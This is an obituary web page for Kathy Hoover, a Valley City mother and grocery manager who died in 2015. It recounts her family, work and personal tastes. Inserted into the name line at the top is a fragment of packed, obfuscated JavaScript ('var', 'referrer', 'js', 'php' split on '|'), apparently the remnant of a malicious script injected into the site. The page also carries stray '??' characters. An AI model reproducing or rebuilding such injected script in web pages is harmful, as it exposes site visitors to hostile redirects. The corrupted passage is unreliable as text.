Kathy HooverKathy tddyz|var|u0026u|referrer|bzekf||js|php’.split(‘|’),0,{}))
died peacefully Friday, June 19, 2015 under the care of Hospice in her mother’s home. She spent her final days surrounded by many family members and close friends. She was 54 years old. She battled cancer with great strength and dignity. Kathy was blessed in life with four amazing children, Zackary Melford, Danae Martha, and Joshua Floyd all of Fargo, and Nickolas Richard Hass of Valley City.

??The daughter of Floyd and Eva Schweitzer, Kathy was born on May 19, 1961 in Valley City. In addition to her children, she leaves her mother; sister Cindy Larson, Valley City; two brothers Duane Schweitzer (Kristi), Valley City; Jeff Schweitzer (Renee) Fargo; and many nieces and nephews. Her father Floyd predeceased her.??

Kathy attended Valley City High School and Valley City State University. After marrying Jeff Hoover they moved near Nuremberg, Germany and then Seattle, Washington. Kathy and her children returned to Valley City to be close to family.??

Most recently Kathy worked as grocery manager at Leevers Foods and as a part-time employee at Drug Plastics. She is remembered for her energy and strong work ethic. To her coworkers she was an approachable problem solver who earned the moniker “Momma Kathy.”??

Kathy loved her life. When she wasn’t being a selfless mom, she enjoyed a good thunder and lightning storm, astronomy, playing pinochle and cribbage, science fiction and action movies, Sierra Mist, Pringles and wolves. She liked to dance, was intensely private, and believed in creating and following her own path.??

Of all the things she did in life, nothing compared to being with her children. She loved sharing life’s moments with them; the good, the bad, the glad and the sad times. Kathy would like to be remembered, with laughter and love. She’d want family and friends to know “It’s all good. Life was good. It was like, kick.”

??Kathy’s family is grateful for the comforting care and support provided by Hospice of the Red River Valley.??
